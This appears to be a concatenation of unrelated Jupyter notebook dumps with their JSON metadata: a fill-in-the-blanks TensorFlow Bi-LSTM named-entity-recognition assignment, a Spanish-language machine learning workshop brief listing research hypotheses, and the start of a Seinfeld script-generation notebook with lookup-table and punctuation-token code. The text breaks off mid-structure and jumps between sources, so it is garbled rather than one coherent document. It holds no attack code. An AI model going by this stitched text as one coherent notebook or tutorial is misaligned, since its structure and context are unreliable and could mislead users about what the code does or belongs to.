name='input_batch') \n self.ground_truth_tags = ######### YOUR CODE HERE #############\n \n # Placeholder for lengths of the sequences.\n self.lengths = tf.placeholder(dtype=tf.int32, shape=[None], name='lengths') \n \n # Placeholder for a dropout keep probability. If we don't feed\n # a value for this placeholder, it will be equal to 1.0.\n self.dropout_ph = tf.placeholder_with_default(tf.cast(1.0, tf.float32), shape=[])\n \n # Placeholder for a learning rate (tf.float32).\n self.learning_rate_ph = ######### YOUR CODE HERE #############", "_____no_output_____" ], [ "BiLSTMModel.__declare_placeholders = classmethod(declare_placeholders)", "_____no_output_____" ] ], [ [ "Now, let us specify the layers of the neural network. First, we need to perform some preparatory steps: \n \n- Create embeddings matrix with [tf.Variable](https://www.tensorflow.org/api_docs/python/tf/Variable). Specify its name (*embeddings_matrix*), type (*tf.float32*), and initialize with random values.\n- Create forward and backward LSTM cells. TensorFlow provides a number of RNN cells ready for you. We suggest that you use *LSTMCell*, but you can also experiment with other types, e.g. GRU cells. [This](http://colah.github.io/posts/2015-08-Understanding-LSTMs/) blogpost could be interesting if you want to learn more about the differences.\n- Wrap your cells with [DropoutWrapper](https://www.tensorflow.org/api_docs/python/tf/contrib/rnn/DropoutWrapper). Dropout is an important regularization technique for neural networks. Specify all keep probabilities using the dropout placeholder that we created before.\n \nAfter that, you can build the computation graph that transforms an input_batch:\n\n- [Look up](https://www.tensorflow.org/api_docs/python/tf/nn/embedding_lookup) embeddings for an *input_batch* in the prepared *embedding_matrix*.\n- Pass the embeddings through [Bidirectional Dynamic RNN](https://www.tensorflow.org/api_docs/python/tf/nn/bidirectional_dynamic_rnn) with the specified forward and backward cells. Use the lengths placeholder here to avoid computations for padding tokens inside the RNN.\n- Create a dense layer on top. Its output will be used directly in loss function. \n \nFill in the code below. 
In case you need to debug something, the easiest way is to check that tensor shapes of each step match the expected ones. \n ", "_____no_output_____" ] ], [ [ "def build_layers(self, vocabulary_size, embedding_dim, n_hidden_rnn, n_tags):\n \"\"\"Specifies bi-LSTM architecture and computes logits for inputs.\"\"\"\n \n # Create embedding variable (tf.Variable) with dtype tf.float32\n initial_embedding_matrix = np.random.randn(vocabulary_size, embedding_dim) / np.sqrt(embedding_dim)\n embedding_matrix_variable = ######### YOUR CODE HERE #############\n \n # Create RNN cells (for example, tf.nn.rnn_cell.BasicLSTMCell) with n_hidden_rnn number of units \n # and dropout (tf.nn.rnn_cell.DropoutWrapper), initializing all *_keep_prob with dropout placeholder.\n forward_cell = ######### YOUR CODE HERE #############\n backward_cell = ######### YOUR CODE HERE #############\n\n # Look up embeddings for self.input_batch (tf.nn.embedding_lookup).\n # Shape: [batch_size, sequence_len, embedding_dim].\n embeddings = ######### YOUR CODE HERE #############\n \n # Pass them through Bidirectional Dynamic RNN (tf.nn.bidirectional_dynamic_rnn).\n # Shape: [batch_size, sequence_len, 2 * n_hidden_rnn]. \n # Also don't forget to initialize sequence_length as self.lengths and dtype as tf.float32.\n (rnn_output_fw, rnn_output_bw), _ = ######### YOUR CODE HERE #############\n rnn_output = tf.concat([rnn_output_fw, rnn_output_bw], axis=2)\n\n # Dense layer on top.\n # Shape: [batch_size, sequence_len, n_tags]. \n self.logits = tf.layers.dense(rnn_output, n_tags, activation=None)", "_____no_output_____" ], [ "BiLSTMModel.__build_layers = classmethod(build_layers)", "_____no_output_____" ] ], [ [ "To compute the actual predictions of the neural network, you need to apply [softmax](https://www.tensorflow.org/api_docs/python/tf/nn/softmax) to the last layer and find the most probable tags with [argmax](https://www.tensorflow.org/api_docs/python/tf/argmax).", "_____no_output_____" ] ], [ [ "def compute_predictions(self):\n \"\"\"Transforms logits to probabilities and finds the most probable tags.\"\"\"\n \n # Create softmax (tf.nn.softmax) function\n softmax_output = ######### YOUR CODE HERE #############\n \n # Use argmax (tf.argmax) to get the most probable tags\n # Don't forget to set axis=-1\n # otherwise argmax will be calculated in a wrong way\n self.predictions = ######### YOUR CODE HERE #############", "_____no_output_____" ], [ "BiLSTMModel.__compute_predictions = classmethod(compute_predictions)", "_____no_output_____" ] ], [ [ "During training we do not need predictions of the network, but we need a loss function. We will use [cross-entropy loss](http://ml-cheatsheet.readthedocs.io/en/latest/loss_functions.html#cross-entropy), efficiently implemented in TF as \n[cross entropy with logits](https://www.tensorflow.org/api_docs/python/tf/nn/softmax_cross_entropy_with_logits_v2). Note that it should be applied to logits of the model (not to softmax probabilities!). Also note, that we do not want to take into account loss terms coming from `<PAD>` tokens. 
So we need to mask them out, before computing [mean](https://www.tensorflow.org/api_docs/python/tf/reduce_mean).", "_____no_output_____" ] ], [ [ "def compute_loss(self, n_tags, PAD_index):\n \"\"\"Computes masked cross-entopy loss with logits.\"\"\"\n \n # Create cross entropy function function (tf.nn.softmax_cross_entropy_with_logits_v2)\n ground_truth_tags_one_hot = tf.one_hot(self.ground_truth_tags, n_tags)\n loss_tensor = ######### YOUR CODE HERE #############\n \n mask = tf.cast(tf.not_equal(self.input_batch, PAD_index), tf.float32)\n # Create loss function which doesn't operate with <PAD> tokens (tf.reduce_mean)\n # Be careful that the argument of tf.reduce_mean should be\n # multiplication of mask and loss_tensor.\n self.loss = ######### YOUR CODE HERE #############", "_____no_output_____" ], [ "BiLSTMModel.__compute_loss = classmethod(compute_loss)", "_____no_output_____" ] ], [ [ "The last thing to specify is how we want to optimize the loss. \nWe suggest that you use [Adam](https://www.tensorflow.org/api_docs/python/tf/train/AdamOptimizer) optimizer with a learning rate from the corresponding placeholder. \nYou will also need to apply clipping to eliminate exploding gradients. It can be easily done with [clip_by_norm](https://www.tensorflow.org/api_docs/python/tf/clip_by_norm) function. ", "_____no_output_____" ] ], [ [ "def perform_optimization(self):\n \"\"\"Specifies the optimizer and train_op for the model.\"\"\"\n \n # Create an optimizer (tf.train.AdamOptimizer)\n self.optimizer = ######### YOUR CODE HERE #############\n self.grads_and_vars = self.optimizer.compute_gradients(self.loss)\n \n # Gradient clipping (tf.clip_by_norm) for self.grads_and_vars\n # Pay attention that you need to apply this operation only for gradients \n # because self.grads_and_vars also contains variables.\n # list comprehension might be useful in this case.\n clip_norm = tf.cast(1.0, tf.float32)\n self.grads_and_vars = ######### YOUR CODE HERE #############\n \n self.train_op = self.optimizer.apply_gradients(self.grads_and_vars)", "_____no_output_____" ], [ "BiLSTMModel.__perform_optimization = classmethod(perform_optimization)", "_____no_output_____" ] ], [ [ "Congratulations! You have specified all the parts of your network. You may have noticed, that we didn't deal with any real data yet, so what you have written is just recipes on how the network should function.\nNow we will put them to the constructor of our Bi-LSTM class to use it in the next section. ", "_____no_output_____" ] ], [ [ "def init_model(self, vocabulary_size, n_tags, embedding_dim, n_hidden_rnn, PAD_index):\n self.__declare_placeholders()\n self.__build_layers(vocabulary_size, embedding_dim, n_hidden_rnn, n_tags)\n self.__compute_predictions()\n self.__compute_loss(n_tags, PAD_index)\n self.__perform_optimization()", "_____no_output_____" ], [ "BiLSTMModel.__init__ = classmethod(init_model)", "_____no_output_____" ] ], [ [ "## Train the network and predict tags", "_____no_output_____" ], [ "[Session.run](https://www.tensorflow.org/api_docs/python/tf/Session#run) is a point which initiates computations in the graph that we have defined. To train the network, we need to compute *self.train_op*, which was declared in *perform_optimization*. To predict tags, we just need to compute *self.predictions*. Anyway, we need to feed actual data through the placeholders that we defined before. 
", "_____no_output_____" ] ], [ [ "def train_on_batch(self, session, x_batch, y_batch, lengths, learning_rate, dropout_keep_probability):\n feed_dict = {self.input_batch: x_batch,\n self.ground_truth_tags: y_batch,\n self.learning_rate_ph: learning_rate,\n self.dropout_ph: dropout_keep_probability,\n self.lengths: lengths}\n \n session.run(self.train_op, feed_dict=feed_dict)", "_____no_output_____" ], [ "BiLSTMModel.train_on_batch = classmethod(train_on_batch)", "_____no_output_____" ] ], [ [ "Implement the function *predict_for_batch* by initializing *feed_dict* with input *x_batch* and *lengths* and running the *session* for *self.predictions*.", "_____no_output_____" ] ], [ [ "def predict_for_batch(self, session, x_batch, lengths):\n ######################################\n ######### YOUR CODE HERE #############\n ######################################\n \n return predictions", "_____no_output_____" ], [ "BiLSTMModel.predict_for_batch = classmethod(predict_for_batch)", "_____no_output_____" ] ], [ [ "We finished with necessary methods of our BiLSTMModel model and almost ready to start experimenting.\n\n### Evaluation \nTo simplify the evaluation process we provide two functions for you:\n - *predict_tags*: uses a model to get predictions and transforms indices to tokens and tags;\n - *eval_conll*: calculates precision, recall and F1 for the results.", "_____no_output_____" ] ], [ [ "from evaluation import precision_recall_f1", "_____no_output_____" ], [ "def predict_tags(model, session, token_idxs_batch, lengths):\n \"\"\"Performs predictions and transforms indices to tokens and tags.\"\"\"\n \n tag_idxs_batch = model.predict_for_batch(session, token_idxs_batch, lengths)\n \n tags_batch, tokens_batch = [], []\n for tag_idxs, token_idxs in zip(tag_idxs_batch, token_idxs_batch):\n tags, tokens = [], []\n for tag_idx, token_idx in zip(tag_idxs, token_idxs):\n tags.append(idx2tag[tag_idx])\n tokens.append(idx2token[token_idx])\n tags_batch.append(tags)\n tokens_batch.append(tokens)\n return tags_batch, tokens_batch\n \n \ndef eval_conll(model, session, tokens, tags, short_report=True):\n \"\"\"Computes NER quality measures using CONLL shared task script.\"\"\"\n \n y_true, y_pred = [], []\n for x_batch, y_batch, lengths in batches_generator(1, tokens, tags):\n tags_batch, tokens_batch = predict_tags(model, session, x_batch, lengths)\n if len(x_batch[0]) != len(tags_batch[0]):\n raise Exception(\"Incorrect length of prediction for the input, \"\n \"expected length: %i, got: %i\" % (len(x_batch[0]), len(tags_batch[0])))\n predicted_tags = []\n ground_truth_tags = []\n for gt_tag_idx, pred_tag, token in zip(y_batch[0], tags_batch[0], tokens_batch[0]): \n if token != '<PAD>':\n ground_truth_tags.append(idx2tag[gt_tag_idx])\n predicted_tags.append(pred_tag)\n\n # We extend every prediction and ground truth sequence with 'O' tag\n # to indicate a possible end of entity.\n y_true.extend(ground_truth_tags + ['O'])\n y_pred.extend(predicted_tags + ['O'])\n \n results = precision_recall_f1(y_true, y_pred, print_results=True, short_report=short_report)\n return results", "_____no_output_____" ] ], [ [ "## Run your experiment", "_____no_output_____" ], [ "Create *BiLSTMModel* model with the following parameters:\n - *vocabulary_size* — number of tokens;\n - *n_tags* — number of tags;\n - *embedding_dim* — dimension of embeddings, recommended value: 200;\n - *n_hidden_rnn* — size of hidden layers for RNN, recommended value: 200;\n - *PAD_index* — an index of the padding token (`<PAD>`).\n\nSet 
hyperparameters. You might want to start with the following recommended values:\n- *batch_size*: 32;\n- 4 epochs;\n- starting value of *learning_rate*: 0.005\n- *learning_rate_decay*: a square root of 2;\n- *dropout_keep_probability*: try several values: 0.1, 0.5, 0.9.\n\nHowever, feel free to conduct more experiments to tune hyperparameters and earn extra points for the assignment.", "_____no_output_____" ] ], [ [ "tf.reset_default_graph()\n\nmodel = ######### YOUR CODE HERE #############\n\nbatch_size = ######### YOUR CODE HERE #############\nn_epochs = ######### YOUR CODE HERE #############\nlearning_rate = ######### YOUR CODE HERE #############\nlearning_rate_decay = ######### YOUR CODE HERE #############\ndropout_keep_probability = ######### YOUR CODE HERE #############", "_____no_output_____" ] ], [ [ "If you got an error *\"Tensor conversion requested dtype float64 for Tensor with dtype float32\"* in this point, check if there are variables without dtype initialised. Set the value of dtype equals to *tf.float32* for such variables.", "_____no_output_____" ], [ "Finally, we are ready to run the training!", "_____no_output_____" ] ], [ [ "sess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nprint('Start training... \\n')\nfor epoch in range(n_epochs):\n # For each epoch evaluate the model on train and validation data\n print('-' * 20 + ' Epoch {} '.format(epoch+1) + 'of {} '.format(n_epochs) + '-' * 20)\n print('Train data evaluation:')\n eval_conll(model, sess, train_tokens, train_tags, short_report=True)\n print('Validation data evaluation:')\n eval_conll(model, sess, validation_tokens, validation_tags, short_report=True)\n \n # Train the model\n for x_batch, y_batch, lengths in batches_generator(batch_size, train_tokens, train_tags):\n model.train_on_batch(sess, x_batch, y_batch, lengths, learning_rate, dropout_keep_probability)\n \n # Decaying the learning rate\n learning_rate = learning_rate / learning_rate_decay\n \nprint('...training finished.')", "_____no_output_____" ] ], [ [ "Now let us see full quality reports for the final model on train, validation, and test sets. To give you a hint whether you have implemented everything correctly, you might expect F-score about 40% on the validation set.\n\n**The output of the cell below (as well as the output of all the other cells) should be present in the notebook for peer2peer review!**", "_____no_output_____" ] ], [ [ "print('-' * 20 + ' Train set quality: ' + '-' * 20)\ntrain_results = eval_conll(model, sess, train_tokens, train_tags, short_report=False)\n\nprint('-' * 20 + ' Validation set quality: ' + '-' * 20)\nvalidation_results = ######### YOUR CODE HERE #############\n\nprint('-' * 20 + ' Test set quality: ' + '-' * 20)\ntest_results = ######### YOUR CODE HERE #############", "_____no_output_____" ] ], [ [ "### Conclusions\n\nCould we say that our model is state of the art and the results are acceptable for the task? Definately, we can say so. Nowadays, Bi-LSTM is one of the state of the art approaches for solving NER problem and it outperforms other classical methods. Despite the fact that we used small training corpora (in comparison with usual sizes of corpora in Deep Learning), our results are quite good. In addition, in this task there are many possible named entities and for some of them we have only several dozens of trainig examples, which is definately small. However, the implemented model outperforms classical CRFs for this task. 
Even better results could be obtained by combining several types of methods, e.g. see [this](https://arxiv.org/abs/1603.01354) paper if you are interested.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb20279df79f321c9ad9ba6907475201c9eee2d8
12,023
ipynb
Jupyter Notebook
labs/[ANN]Taller1_INF398_2021_II.ipynb
Tomas-Werth/MAT281-portafolio
3baac1a83f1eb6c910a1c165e2afd2e48e2276e9
[ "MIT" ]
null
null
null
labs/[ANN]Taller1_INF398_2021_II.ipynb
Tomas-Werth/MAT281-portafolio
3baac1a83f1eb6c910a1c165e2afd2e48e2276e9
[ "MIT" ]
null
null
null
labs/[ANN]Taller1_INF398_2021_II.ipynb
Tomas-Werth/MAT281-portafolio
3baac1a83f1eb6c910a1c165e2afd2e48e2276e9
[ "MIT" ]
null
null
null
47.14902
483
0.675455
[ [ [ "<center><img src=\"http://www.exalumnos.usm.cl/wp-content/uploads/2015/06/Isotipo-Negro.gif\" title=\"Title text\" width=\"30%\" /></center>\n\n<hr style=\"height:2px;border:none\"/>\n<h1 align='center'> INF-398 Aprendizaje Automático </h1>\n\n<H3 align='center'> Tarea/Taller 1 </H3>\n<hr style=\"height:2px;border:none\"/>\n", "_____no_output_____" ], [ "# Temas", "_____no_output_____" ], [ "* Clasificadores Discriminativos Clásicos\n* Clasificadores Generativos Clásicos\n* Evaluación de Clasificadores\n", "_____no_output_____" ], [ "# Reglas & Formalidades\n\n* Pueden trabajar en equipos de 2 a 3 personas. \n* Los equipos deben ser inscritos antes del 24 Septiembre.\n* Pueden reusar código visto en clases y/o recolectar código/ideas de otros sitios, mencionando al autor y entregando un link a la fuente. \n* Si resulta necesaria, la intervención de personas ajenas al grupo (e.g. experto) debe ser declarada y justificada.\n* Tener roles dentro del equipo está bien, pero al final del proceso, cada miembro debe entender y estar en condiciones de exponer todo el trabajo realizado. \n", "_____no_output_____" ], [ "## Entregables \n\n", "_____no_output_____" ], [ "\n> * **Video:** Se debe preparar un video explicativo de **15 a 20 minutos** donde se describe la metodología utilizada, los resultados obtenidos y las conclusiones de la experiencia. \n\n> * **Código:** Se debe enviar un jupyter notebook con el código utilizado, de modo que sea posible **reproducir los resultados** presentados. Como alternativa, se puede entregar un link Github con el código fuente, incluyendo instrucciones precisas para ejecutar los experimentos. En cualquier caso (notebook o repo) el código debe estar ordenado y seccionado apropiadamente.\n\n> * **Conformidad Ética:** Se debe incluir una breve declaración ética en que se indique que el trabajo que se está enviando es un trabajo original, desarollado por los autores en conformidad con todas reglas antes mencionadas. Se debe también mencionar brevemente cuál fue la contribución de cada miembro del equipo. La declaración puede ser parte del notebook o estar en un archivo dentro del repo.\n\n> * **Defensa en vivo (video-conferencia):** El día de clases agendado para la discusión del taller, se seleccionarán aleatoriamente algunos equipos que presentarán oralmente su trabajo ante el curso. Los autores serán evaluados considerando la discusión y debate que generen entre sus pares. Los puntos obtenidos (positivos o negativos) se sumarán a la nota final de taller.", "_____no_output_____" ], [ "## Fechas", "_____no_output_____" ], [ "> * Defensas: 15 de Octubre, horario de clases.\n> * Fecha de entrega de vídeo: 16 de Octubre 23:59 Hrs. (1 días después de encuentro).\n> * Fecha de entrega de Jupyter (notebook): 15 de Octubre 08:00 (se pueden hacer actualizaciones hasta el 16 de Octubre 23:59 Hrs.). \n\n", "_____no_output_____" ], [ "# Instrucciones", "_____no_output_____" ], [ "La tarea se divide en dos secciones:\n\n\n\n> **1. Pregunta de Investigación**. Para esta parte, los autores deben elegir una hipótesis de investigación y diseñar un procedimiento experimental que permita reunir evidencia en contra o a favor de la misma. Es legítimo tomar una posición *a-priori* en base a lo que han aprendido en el curso, pero es importante analizar críticamente los resultados sin descartar hipótesis alternativas. \n\n> La metodología debe incluir al menos 3 datasets, de los cuales al menos 2 deben ser reales. 
Es deseable también que incluyan experimentos controlados sobre dataset sintéticos o semi-sintéticos no triviales diseñados por ustedes. Por ejemplo, para demostrar que un método logra ignorar variables irrelevantes se podrían crear variables \"fake\" manualmente. Experimentos de este último tipo que se basen en un dataset real contarán como realizados sobre \"dataset reales\".\n\n> Si no es relevante para la pregunta de investigación y en honor al tiempo, no es necesario llevar a cabo un análisis exploratorio detallado sobre cada dataset utilizado.\n\n> **2. Desafío Kaggle**. Para esta parte, los autores enfrentarán un desafío en la plataforma Kaggle y serán calificados en base a su posición en el tablero de resultados y el puntaje obtenido.\n\n\n\n", "_____no_output_____" ], [ "<hr style=\"height:2px;border:none\"/>\n", "_____no_output_____" ], [ "# Parte 1. Pregunta de Investigación", "_____no_output_____" ], [ "Reuna evidencia experimental para refutar o sostener una de las siguientes hipótesis u afirmaciones (máximo 2 equipos por hipótesis).\n\nElegir tema acá **usando el nombre del equipo**:\n\nhttps://doodle.com/poll/qgw7h5xb72khqq9x?utm_source=poll&utm_medium=link\n", "_____no_output_____" ], [ "\n\n\n> **1. Clasificadores Discriminativos versus Generativos.** Con muy pocos ejemplos etiquetados, un clasificador generativo alcanza un mejor error de clasificación que un clasificador discriminativo. Sin embargo, a medida que aumenta el número de ejemplos, la situación se invierte.\n\n> **2. Perceptrón y Margen.** La cota teórica que relaciona el número de iteraciones del perceptrón con el margen no se verifica experimentalmente, sobre pasándose en la mayoría de los casos.\n\n> **3. Margen y Overfitting.** El error de predicción de un clasificador lineal no es directamente proporcional al margen obtenido, pero el grado de overfitting sí lo es.\n\n> **4. Regresión Logística Multi-class.**: En problemas multi-class, usar un regresor logístico con heurísticas como OVO permite obtener un mejor desempeño que la extensión nativa.\n\n> **5. Label Noise.**: Un clasificador de tipo generativo es extremadamente sensible a errores de etiquetación, es decir aún si un porcentaje pequeño (< 10%) de las etiquetas de entrenamiento está corrupta, su desempeño se deteriora significativamente (> 10% de acccuracy). \n\n> **6. Crowdsourcing.**: Al entrenar un clasificador logístico con múltiples anotaciones por dato (provistas por diferentes anotadores), el clasificador aprende a predecir la etiqueta mayoritaria.\n\n> **7. Regresión Logística con Pesos:** Modificar los pesos de cada clase en la función objetivo del clasificador logístico permite mejorar los resultados en problemas de clasificación desbalanceados. \n\n> **8. Texto & NLP.** En problemas de clasificación de texto, un modelo Bayesiano Ingenuo puede superar el desempeño de un clasificador discriminativo entrenado sobre una representación neuronal simple tipo AWE.\n\n> **9. Texto & NLP.** Al entrenar un clasificador logístico para texto, el uso de mecanismos para \"pesar\" los términos, como TF-IDF, no genera mejoras significativas ya que el clasificador \"aprende\" directamente estos pesos durante el entrenamiento. \n\n> **10. Entre LDA y QDA.** Un \"híbrido\" LDA/QDA supera tanto a QDA como a LDA.\n\n> Definición del Híbrido: denotemos por $\\hat{\\Sigma}_k$ las matrices de covarianza obtenidas por QDA y por $\\hat{\\Sigma}$ la (única) matriz de covarianza obtenida por LDA. 
El híbrido se define como un clasificador gausiano que usa $\\hat{\\Sigma}_{k} = (1-\\lambda) \\hat{\\Sigma}_k + \\lambda \\hat{\\Sigma}$ como matriz de covarianza para cada clase ($\\lambda$ debe ser seleccionado para cada problema).\n\n> **11. Instance Weighting**: Si se re-entrena un clasificador asignando mayor \"peso\" a los ejemplos que éste clasificó mal en un primer entrenamiento, observaremos una mejora en su desempeño final sobre el conjunto de pruebas. \n\n> **12. Instance Weighting**: Si se re-entrena un clasificador asignando mayor \"peso\" a los ejemplos de entrenamiento más parecidos a los ejemplos de prueba (sólo x), observaremos una mejora en su desempeño final sobre ese último conjunto. \n\n> **13. Clases Desbalanceadas**: Un desbalance en la cantidad de ejemplos por clase afecta mucho más el desempeño de un clasificador discriminativo que el desempeño de un clasificador generativo, ya que en este último caso es posible ajustar manualmente los *a-priori* para corregir la situación.\n\n> **14. Datos Faltantes**: La imputación de atributos faltantes mediante criterios sencillos como la moda o la media deteriora significativamente el desempeño de un clasificador generativo, no así de un clasificador discriminativo. \n\n> **15. Métricas de Evaluación:** El área bajo la curva ROC es proporcional al área bajo la curva PR y por lo tanto un clasificador que supera a otro en términos de AUROC lo hace también en términos de AUPR.\n\n> **16. Métricas de Evaluación:** En problemas de clasificación con clases muy desbalanceadas, las métricas denominadas *Micro-average F-Score* y *AUPR* producen un ranking similar sobre un conjunto de clasificadores. \n\n> **17. Selección de Modelos:** Estimar el error de predicción de un clasificador usando un subconjunto de validación reservado desde dataset original produce resultados muy variables dependiendo del porcentaje seleccionado. Desafortundamente, lo mismo sucede con *K-fold crossvalidation* al considerar diferentes valores de K.\n\n> **18. Selección de Modelos:** El número de variables con que se entrena un modelo es inversamente proporcional al error de pruebas y directamente proporcional a la diferencia entre el error de validación y el error de entrenamiento. \n\n> **19. Selección de Modelos:** Seleccionar el valor de dos hiper-parámetros usando dos validaciones cruzadas independientes es tan efectivo como un utilizar un esquema anidado (nested CV).\n\n", "_____no_output_____" ], [ "# Parte 2. Desafío\n\n> TO BE ANNOUNCED.\n\n\n", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb20337f5ea340bbca4017c4d0a3ac7ac2ae02b9
51,815
ipynb
Jupyter Notebook
project-tv-script-generation/dlnd_tv_script_generation.ipynb
typekev/deep-learning-v2-pytorch
c2d8075137e0a4e8b0dde46d2c7eb2a559a3b8c7
[ "MIT" ]
2
2020-12-28T22:21:15.000Z
2020-12-29T05:17:51.000Z
project-tv-script-generation/dlnd_tv_script_generation.ipynb
typekev/deep-learning-v2-pytorch
c2d8075137e0a4e8b0dde46d2c7eb2a559a3b8c7
[ "MIT" ]
null
null
null
project-tv-script-generation/dlnd_tv_script_generation.ipynb
typekev/deep-learning-v2-pytorch
c2d8075137e0a4e8b0dde46d2c7eb2a559a3b8c7
[ "MIT" ]
null
null
null
37.411552
995
0.55428
[ [ [ "# TV Script Generation\n\nIn this project, you'll generate your own [Seinfeld](https://en.wikipedia.org/wiki/Seinfeld) TV scripts using RNNs. You'll be using part of the [Seinfeld dataset](https://www.kaggle.com/thec03u5/seinfeld-chronicles#scripts.csv) of scripts from 9 seasons. The Neural Network you'll build will generate a new ,\"fake\" TV script, based on patterns it recognizes in this training data.\n\n## Get the Data\n\nThe data is already provided for you in `./data/Seinfeld_Scripts.txt` and you're encouraged to open that file and look at the text. \n>* As a first step, we'll load in this data and look at some samples. \n* Then, you'll be tasked with defining and training an RNN to generate a new script!", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n# load in data\nimport helper\ndata_dir = './data/Seinfeld_Scripts.txt'\ntext = helper.load_data(data_dir)", "_____no_output_____" ] ], [ [ "## Explore the Data\nPlay around with `view_line_range` to view different parts of the data. This will give you a sense of the data you'll be working with. You can see, for example, that it is all lowercase text, and each new line of dialogue is separated by a newline character `\\n`.", "_____no_output_____" ] ], [ [ "view_line_range = (0, 10)\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\nimport numpy as np\n\nprint('Dataset Stats')\nprint('Roughly the number of unique words: {}'.format(len({word: None for word in text.split()})))\n\nlines = text.split('\\n')\nprint('Number of lines: {}'.format(len(lines)))\nword_count_line = [len(line.split()) for line in lines]\nprint('Average number of words in each line: {}'.format(np.average(word_count_line)))\n\nprint()\nprint('The lines {} to {}:'.format(*view_line_range))\nprint('\\n'.join(text.split('\\n')[view_line_range[0]:view_line_range[1]]))", "Dataset Stats\nRoughly the number of unique words: 46367\nNumber of lines: 109233\nAverage number of words in each line: 5.544240293684143\n\nThe lines 0 to 10:\njerry: do you know what this is all about? do you know, why were here? to be out, this is out...and out is one of the single most enjoyable experiences of life. people...did you ever hear people talking about we should go out? this is what theyre talking about...this whole thing, were all out now, no one is home. not one person here is home, were all out! there are people trying to find us, they dont know where we are. (on an imaginary phone) did you ring?, i cant find him. where did he go? he didnt tell me where he was going. he must have gone out. you wanna go out you get ready, you pick out the clothes, right? you take the shower, you get all ready, get the cash, get your friends, the car, the spot, the reservation...then youre standing around, what do you do? you go we gotta be getting back. once youre out, you wanna get back! you wanna go to sleep, you wanna get up, you wanna go out again tomorrow, right? where ever you are in life, its my feeling, youve gotta go. \n\njerry: (pointing at georges shirt) see, to me, that button is in the worst possible spot. the second button literally makes or breaks the shirt, look at it. its too high! its in no-mans-land. you look like you live with your mother. \n\ngeorge: are you through? \n\njerry: you do of course try on, when you buy? \n\ngeorge: yes, it was purple, i liked it, i dont actually recall considering the buttons. 
\n\n" ] ], [ [ "---\n## Implement Pre-processing Functions\nThe first thing to do to any dataset is pre-processing. Implement the following pre-processing functions below:\n- Lookup Table\n- Tokenize Punctuation\n\n### Lookup Table\nTo create a word embedding, you first need to transform the words to ids. In this function, create two dictionaries:\n- Dictionary to go from the words to an id, we'll call `vocab_to_int`\n- Dictionary to go from the id to word, we'll call `int_to_vocab`\n\nReturn these dictionaries in the following **tuple** `(vocab_to_int, int_to_vocab)`", "_____no_output_____" ] ], [ [ "import problem_unittests as tests\nfrom collections import Counter\n\ndef create_lookup_tables(text):\n \"\"\"\n Create lookup tables for vocabulary\n :param text: The text of tv scripts split into words\n :return: A tuple of dicts (vocab_to_int, int_to_vocab)\n \"\"\"\n # TODO: Implement Function\n word_counter = Counter(text)\n \n sorted_vocab_list = sorted(word_counter, key=word_counter.get, reverse=True)\n \n vocab_to_int = {word: i for i, word in enumerate(sorted_vocab_list)} #Do not need to start from index 1 because no padding.\n int_to_vocab = {i: word for word, i in vocab_to_int.items()}\n \n # return tuple\n return (vocab_to_int, int_to_vocab)\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_create_lookup_tables(create_lookup_tables)", "Tests Passed\n" ] ], [ [ "### Tokenize Punctuation\nWe'll be splitting the script into a word array using spaces as delimiters. However, punctuations like periods and exclamation marks can create multiple ids for the same word. For example, \"bye\" and \"bye!\" would generate two different word ids.\n\nImplement the function `token_lookup` to return a dict that will be used to tokenize symbols like \"!\" into \"||Exclamation_Mark||\". Create a dictionary for the following symbols where the symbol is the key and value is the token:\n- Period ( **.** )\n- Comma ( **,** )\n- Quotation Mark ( **\"** )\n- Semicolon ( **;** )\n- Exclamation mark ( **!** )\n- Question mark ( **?** )\n- Left Parentheses ( **(** )\n- Right Parentheses ( **)** )\n- Dash ( **-** )\n- Return ( **\\n** )\n\nThis dictionary will be used to tokenize the symbols and add the delimiter (space) around it. This separates each symbols as its own word, making it easier for the neural network to predict the next word. Make sure you don't use a value that could be confused as a word; for example, instead of using the value \"dash\", try using something like \"||dash||\".", "_____no_output_____" ] ], [ [ "def token_lookup():\n \"\"\"\n Generate a dict to turn punctuation into a token.\n :return: Tokenized dictionary where the key is the punctuation and the value is the token\n \"\"\"\n # TODO: Implement Function\n \n token_dict = {\n '.': \"||dot||\",\n ',': \"||comma||\",\n '\"': \"||doublequote||\",\n ';': \"||semicolon||\",\n '!': \"||bang||\",\n '?': \"||questionmark||\",\n '(': \"||leftparens||\",\n ')': \"||rightparens||\",\n '-': \"||dash||\",\n '\\n': \"||return||\",\n }\n \n \n \n return token_dict\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_tokenize(token_lookup)", "Tests Passed\n" ] ], [ [ "## Pre-process all the data and save it\n\nRunning the code cell below will pre-process all the data and save it to file. 
